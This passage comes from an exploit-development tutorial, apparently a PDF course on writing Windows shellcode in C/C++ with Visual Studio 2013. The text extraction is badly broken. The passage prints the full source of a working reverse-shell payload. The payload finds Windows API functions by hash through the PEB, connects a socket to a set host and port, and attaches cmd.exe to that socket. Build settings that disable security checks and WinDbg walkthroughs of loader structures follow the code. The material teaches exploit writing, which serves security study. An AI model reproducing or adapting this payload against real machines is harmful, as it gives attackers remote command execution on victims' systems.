 SetThreadToken()
.
 
One thing to keep in mind is that 
CreateProcess()
 use the 
primary token
 as the 
token
 for the new 
proce
ss
. 
This is a problem when the 
thread
 which calls 
CreateProcess()
 has a 
secondary token
 with more privileges 
than the 
primary token
. In this case, the new 
process
 will have less privileges than the 
thread
 which created 
it.
 
The solution is to create a new 
p
rimary token
 from the 
secondary token
 of the current 
thread
 by using 
DuplicateTokenEx()
, and then to create the new 
process
 by calling 
CreateProcessAsUser()
 with the new 
primary token
.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 45 
-
 
Shellcode
 
 
Introduction
 
A 
shellcode
 is a piece of code which is sent as 
payload
 by an 
exploit
, is injected in the vulnerable application 
and is executed. A shellcode must be positi
on independent, i.e. it must work no matter its position in 
memory and shouldn’t contain null bytes, because the shellcode is usually copied by functions like 
strcpy()
 
which stop copying when they encounter a null byte. If a shellcode should contain a null
 byte, those 
functions would copy that shellcode only up to the first null byte and thus the shellcode would be incomplete.
 
Shellcode is usually written directly in 
assembly
, but this doesn’t need to be the case. In this section, we’ll 
develop shellcode in
 C/C++
 using 
Visual Studio 2013
. The benefits are evident:
 
1
.
 
shorter development times
 
2
.
 
intellisense
 
3
.
 
ease of debugging
 
We will use VS 2013 to produce an executable file with our shellcode and then we will extract and fix (i.e. 
remove the null bytes) the shell
code with a 
Python
 script.
 
C/C++ code
 
Use only stack variables
 
To write position independent code in C/C++ we must only use variables allocated on the 
stack
. This means 
that we can’t write
 
C++
 
 
1
   
char
 
*
v
 
=
 
new
 
char
[
100
];
 
 
because that array would be allo
cated on the 
heap
. More important, this would try to call the new operator 
function from 
msvcr120.dll
 using an absolute address:
 
00191000 6A 64                push        64h
 
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]
 
The location 192
090h contains the address of the function.
 
If we want to call a function imported from a library, we must do so directly, without relying on import tables 
and the Windows loader.
 
Another problem is that the new operator probably requires some kind of initi
alization performed by the 
runtime component of the C/C++ language. We don’t want to include all that in our shellcode.
 
We can’t use global variables either:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 46 
-
 
C++
 
 
int
 
x
;
 
 
int
 
main
()
 
{
 
  
x
 
=
 
12
;
 
}
 
 
The assignment above (if not optimized out), produces
 
008E
1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch
 
where 8E9130h is the absolute address of the variable 
x
.
 
Strings pose a problem. If we write
 
C++
 
 
char
 
str
[]
 
=
 
"I'm a string"
;
 
printf
(
str
);
 
 
the string will be put into the section 
.
rdata
 of the executable and will be referenced with an absolute address. 
You must not use 
printf
 in your shellcode: this is just an example to see how 
str
 is referenced. Here’s the 
asm code:
 
00A71006 8D 45 F0             lea         eax,[str]
 
00A71009 56  
                 push        esi
 
00A7100A 57                   push        edi
 
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
 
00A71010 8D 7D F0             lea         edi,[str]
 
00A71013 50                   push        eax
 
00A71014 A5             
      movs        dword ptr es:[edi],dword ptr [esi]
 
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
 
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
 
00A71017 A4                   movs        byte pt
r es:[edi],byte ptr [esi]
 
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]
 
As you can see, the string, located at the address A72100h in the 
.rdata
 section, is copied onto the stack (
str
 
points to the stack) through 
movsd
 and 
movsb
. Note t
hat A72100h is an absolute address. This code is 
definitely not position independent.
 
If we write
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 47 
-
 
C++
 
 
char
 
*
str
 
=
 
"I'm a string"
;
 
printf
(
str
);
 
 
the string is still put into the 
.rdata
 section, but it’s not copied onto the stack:
 
00A31000 68 00 21 A3 00   
    push        0A32100h
 
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]
 
The absolute position of the string in 
.rdata
 is A32100h.
 
How can we makes this code position independent?
 
The simpler (partial) solution is rather cumbersome:
 
C++
 
 
char
 
str
[]
 
=
 
{
 
'I'
,
 
'
\
''
,
 
'm'
,
 
' '
,
 
'a'
,
 
' '
,
 
's'
,
 
't'
,
 
'r'
,
 
'i'
,
 
'n'
,
 
'g'
,
 
'
\
0'
 
};
 
printf
(
str
);
 
 
Here’s the asm code:
 
012E1006 8D 45 F0             lea         eax,[str]
 
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
 
012E1010 50      
             push        eax
 
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp
-
0Ch],74732061h
 
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp
-
8],676E6972h
 
012E101F C6 45 FC 00          mov         byte ptr [ebp
-
4],0
 
012E1023 FF 15 90 20 2E 
01    call        dword ptr ds:[12E2090h]
 
Except for the call to 
printf
, this code is position independent because portions of the string are coded 
directly in the source operands of the 
mov
 instructions. Once the string has been built on the stack, it can
 be 
used.
 
Unfortunately, when the string is longer, this method doesn’t work anymore. In fact, the code
 
C++
 
 
char
 
str
[]
 
=
 
{
 
'I'
,
 
'
\
''
,
 
'm'
,
 
' '
,
 
'a'
,
 
' '
,
 
'v'
,
 
'e'
,
 
'r'
,
 
'y'
,
 
' '
,
 
'l'
,
 
'o'
,
 
'n'
,
 
'g'
,
 
' '
,
 
's'
,
 
't'
,
 
'r'
,
 
'i'
,
 
'n'
,
 
'g'
,
 
'
\
0'
 
};
 
printf
(
str
);
 
 
produces
 
013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 48 
-
 
013E100E 8D 45 E8             lea         eax,[str]
 
013E1011 50                   push        eax
 
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
 
013E101
7 C7 45 F8 73 74 72 69 mov         dword ptr [ebp
-
8],69727473h
 
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp
-
4],676Eh
 
013E1024 C6 45 FE 00          mov         byte ptr [ebp
-
2],0
 
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]
 
A
s you can see, part of the string is located in the 
.rdata
 section at the address 13E2100h, while other parts 
of the string are encoded in the source operands of the 
mov
 instructions like before.
 
The solution I came up with is to allow code like
 
C++
 
 
char
 
*
str
 
=
 
"I'm a very long string"
;
 
 
and fix the shellcode with a Python script. That script needs to extract the referenced strings from the 
.rdata
 
section, put them into the shellcode and fix the relocations. We’ll see how soon.
 
Don’t call Windows API direc
tly
 
We can’t write
 
C++
 
 
WaitForSingleObject
(
procInfo
.
hProcess
,
 
INFINITE
);
 
 
in our C/C++ code because “WaitForSingleObject” needs to be imported from kernel32.dll.
 
The process of importing a function from a library is rather complex. In a nutshell, the 
PE
 f
ile contains an 
import table
 and an 
import address table
 (
IAT
). The import table contains information about which functions 
to import from which libraries. The IAT is compiled by the Windows loader when the executable is loaded 
and contains the addresses o
f the imported functions. The code of the executable call the imported functions 
with a level of indirection. For example:
 
 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]
 
The address 1D2094h is the location of the entry (in the IAT) which
 contains the address of the function 
MessageBoxA
. This level of indirection is useful because the call above doesn’t need to be fixed (unless the 
executable is relocated). The only thing the Windows loader needs to fix is the dword at 1D2094h, which is 
th
e address of the 
MessageBoxA
 function.
 
The solution is to get the addresses of the Windows functions directly from the in
-
memory data structures of 
Windows. We’ll see how this is done later.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 49 
-
 
Install VS 2013 CTP
 
First of all, download the 
Visual C++ Compile
r November 2013 CTP
 from 
here
 and install it.
 
Create a New Project
 
Go to 
File
→
New
→
Project...
, select 
Installed
→
Templates
→
Visual C++
→
Win32
→
Win32 Console Application
, 
choose a name f
or the project (I chose 
shellcode
) and hit OK.
 
Go to 
Project
→
<project name> properties
 and a new dialog will appear. Apply the changes to all 
configurations (
Release
 and 
Debug
) by setting 
Configuration
 (top left of the dialog) to 
All Configurations
. 
Then, 
expand 
Configuration Properties
 and under 
General
 modify 
Platform Toolset
 so that it says 
Visual 
C++ Compiler Nov 2013 CTP (CTP_Nov2013)
. This way you’ll be able to use some features of 
C++11
 and 
C++14
 like 
static_assert
.
 
Example of Shellcode
 
Here’s the co
de for a simple 
reverse shell 
(
definition
). Add a file named 
shellcode.cpp
 to the project and 
copy this code in it. Don’t try to understand all the code right now. We’ll discuss it at lengt
h.
 
C++
 
 
// Simple reverse shell shellcode by Massimiliano Tomassoli (2015)
 
// NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".
 
 
#include <WinSock2.h>               
// must preceed #include <windows.h>
 
#include <WS2tcpip.h>
 
#
include <windows.h>
 
#include <winnt.h>
 
#include <winternl.h>
 
#include <stddef.h>
 
#include <stdio.h>
 
 
#define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))
 
 
_inline
 
PEB
 
*
getPEB
()
 
{
 
    
PEB
 
*
p
;
 
    
__asm
 
{
 
        
mov
     
eax
,
 
fs
:[
30
h
]
 
        
mov
     
p
,
 
eax
 
    
}
 
    
return
 
p
;
 
}
 
 
DWORD
 
getHash
(
const
 
char
 
*
str
)
 
{
 
    
DWORD
 
h
 
=
 
0
;
 
    
while
 
(*
str
)
 
{
 
        
h
 
=
 
(
h
 
>>
 
13
)
 
|
 
(
h
 
<<
 
(
32
 
-
 
13
));
       
// ROR h, 13
 
        
h
 
+=
 
*
str
 
>=
 
'a'
 
?
 
*
str
 
-
 
32
 
:
 
*
str
;
    
// convert the character to 
uppercase
 
        
str
++;
 
    
}
 
    
return
 
h
;
 
}
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 50 
-
 
DWORD
 
getFunctionHash
(
const
 
char
 
*
moduleName
,
 
const
 
char
 
*
functionName
)
 
{
 
    
return
 
getHash
(
moduleName
)
 
+
 
getHash
(
functionName
);
 
}
 
 
LDR_DATA_TABLE_ENTRY
 
*
getDataTableEntry
(
const
 
LIST_ENTRY
 
*
ptr
)
 
{
 
    
int
 
list_entry_offset
 
=
 
offsetof
(
LDR_DATA_TABLE_ENTRY
,
 
InMemoryOrderLinks
);
 
    
return
 
(
LDR_DATA_TABLE_ENTRY
 
*)((
BYTE
 
*)
ptr
 
-
 
list_entry_offset
);
 
}
 
 
// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
 
//       nt
dll.RtlExitUserThread. The solution is to follow the forwards manually.
 
PVOID
 
getProcAddrByHash
(
DWORD
 
hash
)
 
{
 
    
PEB
 
*
peb
 
=
 
getPEB
();
 
    
LIST_ENTRY
 
*
first
 
=
 
peb
-
>
Ldr
-
>
InMemoryOrderModuleList
.
Flink
;
 
    
LIST_ENTRY
 
*
ptr
 
=
 
first
;
 
    
do
 
{
                   
         
// for each module
 
        
LDR_DATA_TABLE_ENTRY
 
*
dte
 
=
 
getDataTableEntry
(
ptr
);
 
        
ptr
 
=
 
ptr
-
>
Flink
;
 
 
BYTE
 
*
baseAddress
 
=
 
(
BYTE
 
*)
dte
-
>
DllBase
;
 
        
if
 
(!
baseAddress
)
           
// invalid module(???)
 
            
continue
;
 
        
I
MAGE_DOS_HEADER
 
*
dosHeader
 
=
 
(
IMAGE_DOS_HEADER
 
*)
baseAddress
;
 
        
IMAGE_NT_HEADERS
 
*
ntHeaders
 
=
 
(
IMAGE_NT_HEADERS
 
*)(
baseAddress
 
+
 
dosHeader
-
>
e_lfanew
);
 
        
DWORD
 
iedRVA
 
=
 
ntHeaders
-
>
OptionalHeader
.
DataDirectory
[
IMAGE_DIRECTORY_ENTRY_EXPORT
].
Virtua
lAddress
;
 
        
if
 
(!
iedRVA
)
                
// Export Directory not present
 
            
continue
;
 
        
IMAGE_EXPORT_DIRECTORY
 
*
ied
 
=
 
(
IMAGE_EXPORT_DIRECTORY
 
*)(
baseAddress
 
+
 
iedRVA
);
 
        
char
 
*
moduleName
 
=
 
(
char
 
*)(
baseAddress
 
+
 
ied
-
>
Name
);
 
      
DWORD
 
moduleHash
 
=
 
getHash
(
moduleName
);
 
 
// The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i
-
th
 
        
// element of both arrays refer to the same function. The first array specifies the name whereas
 
        
// the second the ordinal. This ordinal can then be used as an index in the array pointed to by
 
        
// AddressOfFunctions to find the entry point of the function.
 
        
DWORD
 
*
nameRVAs
 
=
 
(
DWORD
 
*)(
baseAddress
 
+
 
ied
-
>
AddressOfNames
);
 
        
for
 
(
DWORD
 
i
 
=
 
0
;
 
i
 
<
 
ied
-
>
NumberOfNames
;
 
++
i
)
 
{
 
            
char
 
*
functionName
 
=
 
(
char
 
*)(
baseAddress
 
+
 
nameRVAs
[
i
]);
 
            
if
 
(
hash
 
==
 
moduleHash
 
+
 
getHash
(
functionName
))
 
{
 
                
WORD
 
ordinal
 
=
 
((
WORD
 
*)(
baseAddress
 
+
 
ied
-
>
AddressOfNameOr
dinals
))[
i
];
 
                
DWORD
 
functionRVA
 
=
 
((
DWORD
 
*)(
baseAddress
 
+
 
ied
-
>
AddressOfFunctions
))[
ordinal
];
 
                
return
 
baseAddress
 
+
 
functionRVA
;
 
            
}
 
        
}
 
    
}
 
while
 
(
ptr
 
!=
 
first
);
 
 
return
 
NULL
;
            
// address not
 found
 
}
 
 
#define HASH_LoadLibraryA           0xf8b7108d
 
#define HASH_WSAStartup             0x2ddcd540
 
#define HASH_WSACleanup             0x0b9d13bc
 
#define HASH_WSASocketA             0x9fd4f16f
 
#define HASH_WSAConnect             0xa50da182
 
#define HA
SH_CreateProcessA         0x231cbe70
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 51 
-
 
#define HASH_inet_ntoa              0x1b73fed1
 
#define HASH_inet_addr              0x011bfae2
 
#define HASH_getaddrinfo            0xdc2953c9
 
#define HASH_getnameinfo            0x5c1c856e
 
#define HASH_ExitThread        
     0x4b3153e0
 
#define HASH_WaitForSingleObject    0xca8e9498
 
 
#define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
 
int
 
entryPoint
()
 
{
 
//  printf("0x%08x
\
n", getFunctionHash("kernel32.dll", "WaitF
orSingleObject"));
 
//  return 0;
 
 
// NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
 
    
//       they're not strictly needed.
 
 
DefineFuncPtr
(
LoadLibraryA
);
 
 
My_LoadLibraryA
(
"ws2_32.dll"
);
 
 
DefineFuncPtr
(
WSAStartup
);
 
    
DefineFuncPtr
(
WSASocketA
);
 
    
DefineFuncPtr
(
WSAConnect
);
 
    
DefineFuncPtr
(
CreateProcessA
);
 
    
DefineFuncPtr
(
inet_ntoa
);
 
    
DefineFuncPtr
(
inet_addr
);
 
    
DefineFuncPtr
(
getaddrinfo
);
 
    
DefineFuncPtr
(
getnameinfo
);
 
    
DefineFuncPtr
(
Exit
Thread
);
 
    
DefineFuncPtr
(
WaitForSingleObject
);
 
 
const
 
char
 
*
hostName
 
=
 
"127.0.0.1"
;
 
    
const
 
int
 
hostPort
 
=
 
123
;
 
 
WSADATA
 
wsaData
;
 
 
if
 
(
My_WSAStartup
(
MAKEWORD
(
2
,
 
2
),
 
&
wsaData
))
 
        
goto
 
__end
;
         
// error
 
    
SOCKET
 
sock
 
=
 
My_WSA
SocketA
(
AF_INET
,
 
SOCK_STREAM
,
 
IPPROTO_TCP
,
 
NULL
,
 
0
,
 
0
);
 
    
if
 
(
sock
 
==
 
INVALID_SOCKET
)
 
        
goto
 
__end
;
 
 
addrinfo
 
*
result
;
 
    
if
 
(
My_getaddrinfo
(
hostName
,
 
NULL
,
 
NULL
,
 
&
result
))
 
        
goto
 
__end
;
 
    
char
 
ip_addr
[
16
];
 
    
My_getnameinfo
(
result
-
>
ai_addr
,
 
result
-
>
ai_addrlen
,
 
ip_addr
,
 
sizeof
(
ip_addr
),
 
NULL
,
 
0
,
 
NI_NUMERICHOST
);
 
 
SOCKADDR_IN
 
remoteAddr
;
 
    
remoteAddr
.
sin_family
 
=
 
AF_INET
;
 
    
remoteAddr
.
sin_port
 
=
 
htons
(
hostPort
);
 
    
remoteAddr
.
sin_addr
.
s_addr
 
=
 
My_inet_addr
(
ip_addr
);
 
 
if
 
(
My_WSAConnect
(
sock
,
 
(
SOCKADDR
 
*)&
remoteAddr
,
 
sizeof
(
remoteAddr
),
 
NULL
,
 
NULL
,
 
NULL
,
 
NULL
))
 
        
goto
 
__end
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 52 
-
 
 
STARTUPINFOA
 
sInfo
;
 
    
PROCESS_INFORMATION
 
procInfo
;
 
    
SecureZeroMemory
(&
sInfo
,
 
sizeof
(
sInfo
));
        
// avoids a call to _memset
 
    
s
Info
.
cb
 
=
 
sizeof
(
sInfo
);
 
    
sInfo
.
dwFlags
 
=
 
STARTF_USESTDHANDLES
;
 
    
sInfo
.
hStdInput
 
=
 
sInfo
.
hStdOutput
 
=
 
sInfo
.
hStdError
 
=
 
(
HANDLE
)
sock
;
 
    
My_CreateProcessA
(
NULL
,
 
"cmd.exe"
,
 
NULL
,
 
NULL
,
 
TRUE
,
 
0
,
 
NULL
,
 
NULL
,
 
&
sInfo
,
 
&
procInfo
);
 
 
// Waits for the p
rocess to finish.
 
    
My_WaitForSingleObject
(
procInfo
.
hProcess
,
 
INFINITE
);
 
 
__end
:
 
    
My_ExitThread
(
0
);
 
 
return
 
0
;
 
}
 
 
int
 
main
()
 
{
 
    
return
 
entryPoint
();
 
}
 
 
Compiler Configuration
 
Go to 
Project
→
<project name> properties
, expand 
Configuration Properties
 and then 
C/C++
. Apply the 
changes to the Release Configuration.
 
Here are the settings you need to change:
 

 
General
:
 
o
 
SDL Checks
: No (/sdl
-
)
 
Maybe this is not needed, but I disabled them anyway.
 

 
Opti
mization
:
 
o
 
Optimization
: Minimize Size (/O1)
 
This is very important! We want a shellcode as small as possible.
 
o
 
Inline Function Expansion
: Only __inline (/Ob1)
 
If a function 
A
 calls a function 
B
 and 
B
 is inlined, then the call to 
B
 is replaced with the code 
of 
B
 itself. 
With this setting we tell VS 2013 to inline only functions decorated with 
_inline
.
 
This is critical! 
main()
 just calls the 
entryPoint
 function of our shellcode. If the 
entryPoint
 function is 
short, it might be inlined into 
main()
. This would b
e disastrous because 
main()
 wouldn’t indicate the 
end of our shellcode anymore (in fact, it would contain part of it). We’ll see why this is important later.
 
o
 
Enable Intrinsic Functions
: Yes (/Oi)
 
I don’t know if this should be disabled.
 
o
 
Favor Size Or Speed
: Favor small code (/Os)
 
o
 
Whole Program Optimization
: Yes (/GL)
 

 
Code Generation
:
 
o
 
Security Check
: Disable Security Check (/GS
-
)
 
We don’t need any security checks!
 
o
 
Enable Function
-
Level linking
: Yes (/Gy)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 53 
-
 
Linker Configuration
 
Go to 
Project
→
<project name> properties
, expand 
Configuration Properties
 and then 
Linker
. Apply the 
changes to the Release Configuration. Here are the settings you need to change:
 

 
General
:
 
o
 
Enable Incremental Linking
: No (/INCREMENTAL:NO)
 

 
Debugging
:
 
o
 
Generate Map File
: Y
es (/MAP)
 
Tells the linker to generate a map file containing the structure of the EXE.
 
o
 
Map File Name
: mapfile
 
This is the name of the map file. Choose whatever name you like.
 

 
Optimization
:
 
o
 
References
: Yes (/OPT:REF)
 
This is very important to generate a sma
ll shellcode because eliminates functions and data that are 
never referenced by the code.
 
o
 
Enable COMDAT Folding
: Yes (/OPT:ICF)
 
o
 
Function Order
: function_order.txt
 
This reads a file called 
function_order.txt
 which specifies the order in which the functions 
must appear 
in the code section. We want the function 
entryPoint
 to be the first function in the code section so my 
function_order.txt
 contains just a single line with the word 
?entryPoint@@YAHXZ
. You can find the 
names of the functions in the map file.
 
ge
tProcAddrByHash
 
This function returns the address of a function exported by a module (.exe or .dll) present in memory, given 
the 
hash
 associated with the module and the function. It’s certainly possible to find functions by name, but 
that would waste consi
derable space because those names should be included in the shellcode. On the 
other hand, a hash is only 4 bytes. Since we don’t use two hashes (one for the module and the other for the 
function), 
getProcAddrByHash
 needs to consider all the modules loaded 
in memory.
 
The hash for 
MessageBoxA
, exported by 
user32.dll
, can be computed as follows:
 
C++
 
 
DWORD
 
hash
 
=
 
getFunctionHash
(
"user32.dll"
,
 
"MessageBoxA"
);
 
 
where hash is the sum of 
getHash(“user32.dll”)
 and 
getHash(“MessageBoxA”)
. The implementation of 
getHa
sh
 is very simple:
 
C++
 
 
DWORD
 
getHash
(
const
 
char
 
*
str
)
 
{
 
    
DWORD
 
h
 
=
 
0
;
 
    
while
 
(*
str
)
 
{
 
        
h
 
=
 
(
h
 
>>
 
13
)
 
|
 
(
h
 
<<
 
(
32
 
-
 
13
));
       
// ROR h, 13
 
        
h
 
+=
 
*
str
 
>=
 
'a'
 
?
 
*
str
 
-
 
32
 
:
 
*
str
;
    
// convert the character to uppercase
 
        
str
++;
 
 
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 54 
-
 
    
return
 
h
;
 
}
 
 
As you can see, the hash is case
-
insensitive. This is important because in some versions of Windows the 
names in memory are all uppercase.
 
First, 
getProcAddrByHash
 gets the address of the 
TEB
 (
T
hread 
E
nvironment 
B
lock):
 
C++
 
 
PEB
 
*
peb
 
=
 
getPEB
();
 
 
where
 
C++
 
 
_inline
 
PEB
 
*
getPEB
()
 
{
 
    
PEB
 
*
p
;
 
    
__asm
 
{
 
        
mov
     
eax
,
 
fs
:[
30h
]
 
        
mov
     
p
,
 
eax
 
    
}
 
    
return
 
p
;
 
}
 
 
The 
selector
 
fs
 is associated with a 
segment
 which starts at the address of the TEB. At offset 30h, the TEB 
contains a pointer to the 
PEB
 (
P
rocess 
E
nvironment 
B
lock). We can see this in WinDbg:
 
0:000> dt _TEB @$teb
 
ntdll!_TEB
 
+0x000 NtTib            : _NT_TIB
 
+0x01c EnvironmentPointer : (null)
 
+0x020 ClientId         : _CLIENT_ID
 
+0x028 ActiveRpcHandle  : (null)
 
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
 
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
 
+0x034 LastErrorValue   : 0
 
+0x038 CountOfOwnedCriticalSections : 0
 
+0x03c CsrClientThread  : (null)
 
<snip>
 
The PEB, as the name implies, is associated wit
h the current process and contains, among other things, 
information about the modules loaded into the process address space.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 55 
-
 
Here’s 
getProcAddrByHash
 again:
 
C++
 
 
PVOID
 
getProcAddrByHash
(
DWORD
 
hash
)
 
{
 
    
PEB
 
*
peb
 
=
 
getPEB
();
 
    
LIST_ENTRY
 
*
first
 
=
 
peb
-
>
Ld
r
-
>
InMemoryOrderModuleList
.
Flink
;
 
    
LIST_ENTRY
 
*
ptr
 
=
 
first
;
 
    
do
 
{
                            
// for each module
 
        
LDR_DATA_TABLE_ENTRY
 
*
dte
 
=
 
getDataTableEntry
(
ptr
);
 
        
ptr
 
=
 
ptr
-
>
Flink
;
 
        
.
 
        
.
 
        
.
 
    
}
 
while
 
(
ptr
 
!=
 
fi
rst
);
 
 
return
 
NULL
;
            
// address not found
 
}
 
 
Here’s part of the PEB:
 
0:000> dt _PEB @$peb
 
ntdll!_PEB
 
   +0x000 InheritedAddressSpace : 0 ''
 
   +0x001 ReadImageFileExecOptions : 0 ''
 
   +0x002 BeingDebugged    : 0x1 ''
 
   
+0x003 BitField     
    : 0x8 ''
 
   +0x003 ImageUsesLargePages : 0y0
 
   
+0x003 IsProtectedProcess : 0y0
 
   +0x003 IsLegacyProcess  : 0y0
 
   +0x003 IsImageDynamicallyRelocated : 0y1
 
   +0x003 SkipPatchingUser32Forwarders : 0y0
 
   +0x003 SpareBits        : 0y000
 
   +0x004 Mutan
t           : 0xffffffff Void
 
   +0x008 ImageBaseAddress : 0x00060000 Void
 
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
 
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
 
   +0x014 SubSystemData    : (null)
 
   +0x018 ProcessHeap
      : 0x00680000 Void
 
   
<snip>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 56 
-
 
At offset 0Ch, there is a field called 
Ldr
 which points to a 
PEB_LDR_DATA
 data structure. Let’s see that in 
WinDbg:
 
0:000> dt _PEB_LDR_DATA 0x76fd0200
 
ntdll!_PEB_LDR_DATA
 
   +0x000 Length           : 0x30
 
   +0x004 Initial
ized      : 0x1 ''
 
   
+0x008 SsHandle         : (null)
 
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 
-
 0x6862c0 ]
 
   
+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 
-
 0x6862c8 ]
 
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0
x683120 
-
 0x6862d0 ]
 
   +0x024 EntryInProgress  : (null)
 
   +0x028 ShutdownInProgress : 0 ''
 
   +0x02c ShutdownThreadId : (null)
 
InMemoryOrderModuleList
 is a doubly
-
linked list of 
LDR_DATA_TABLE_ENTRY
 structures associated with 
the modules loaded in the cu
rrent process’s address space. To be precise, 
InMemoryOrderModuleList
 is a 
LIST_ENTRY
, which contains two fields:
 
0:000> dt _LIST_ENTRY
 
ntdll!_LIST_ENTRY
 
   +0x000 Flink            : Ptr32 _LIST_ENTRY
 
   +0x004 Blink            : Ptr32 _LIST_ENTRY
 
Flink
 me
ans forward link and 
Blink
 backward link. Flink points to the 
LDR_DATA_TABLE_ENTRY
 of the first 
module. Well, not exactly: Flink points to a 
LIST_ENTRY
 structure contained in the structure 
LDR_DATA_TABLE_ENTRY
.
 
Let’s see how 
LDR_DATA_TABLE_ENTRY
 is defined
:
 
0:000> dt _LDR_DATA_TABLE_ENTRY
 
ntdll!_LDR_DATA_TABLE_ENTRY
 
   +0x000 InLoadOrderLinks : _LIST_ENTRY
 
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
 
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
 
   +0x018 DllBase          : Ptr32 Void
 
   +0x01c EntryPoin
t       : Ptr32 Void
 
   +0x020 SizeOfImage      : Uint4B
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 57 
-
 
   +0x024 FullDllName      : _UNICODE_STRING
 
   +0x02c BaseDllName      : _UNICODE_STRING
 
   +0x034 Flags            : Uint4B
 
   +0x038 LoadCount        : Uint2B
 
   +0x03a TlsIndex         : Uint2B
 
 
  +0x03c HashLinks        : _LIST_ENTRY
 
   +0x03c SectionPointer   : Ptr32 Void
 
   +0x040 CheckSum         : Uint4B
 
   +0x044 TimeDateStamp    : Uint4B
 
   +0x044 LoadedImports    : Ptr32 Void
 
   +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEX
T
 
   +0x04c PatchInformation : Ptr32 Void
 
   +0x050 ForwarderLinks   : _LIST_ENTRY
 
   +0x058 ServiceTagLinks  : _LIST_ENTRY
 
   +0x060 StaticLinks      : _LIST_ENTRY
 
   +0x068 ContextInformation : Ptr32 Void
 
   +0x06c OriginalBase     : Uint4B
 
   +0x070 Loa
dTime         : _LARGE_INTEGER
 
InMemoryOrderModuleList.Flink
 points to 
_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks
 which is at 
offset 8, so we must subtract 8 to get the address of 
_LDR_DATA_TABLE_ENTRY
.
 
First, let’s get the Flink pointer:
 
+0x00c InLoadOrderM
oduleList : _LIST_ENTRY [ 0x683080 
-
 0x6862c0 ]
 
Its value is 0x683080, so the 
_LDR_DATA_TABLE_ENTRY
 structure is at address 0x683080 
–
 8 = 
0x683078:
 
0:000> dt _LDR_DATA_TABLE_ENTRY 683078
 
ntdll!_LDR_DATA_TABLE_ENTRY
 
   +0x000 InLoadOrderLinks : _LIST_ENTRY
 [ 0x359469e5 
-
 0x1800eeb1 ]
 
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 
-
 0x76fd020c ]
 
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 
-
 0x76fd0214 ]
 
   +0x018 DllBase          : (null)
 
   +0x01c EntryPoint       : (null)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 58 
-
 
   +0x020
 SizeOfImage      : 0x60000
 
   +0x024 FullDllName      : _UNICODE_STRING "
蒮
m
쿟
 
엘
 
膪
n
???"
 
   +0x02c BaseDllName      : _UNICODE_STRING "C:
\
Windows
\
SysWOW64
\
calc.exe"
 
   +0x034 Flags            : 0x120010
 
   +0x038 LoadCount        : 0x2034
 
   +0x03a TlsIndex 
        : 0x68
 
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 
-
 0xffff ]
 
   +0x03c SectionPointer   : 0x00004000 Void
 
   +0x040 CheckSum         : 0xffff
 
   +0x044 TimeDateStamp    : 0x6841b4
 
   
+0x044 LoadedImports    : 0x006841b4 Void
 
   +0x048 EntryP
ointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
 
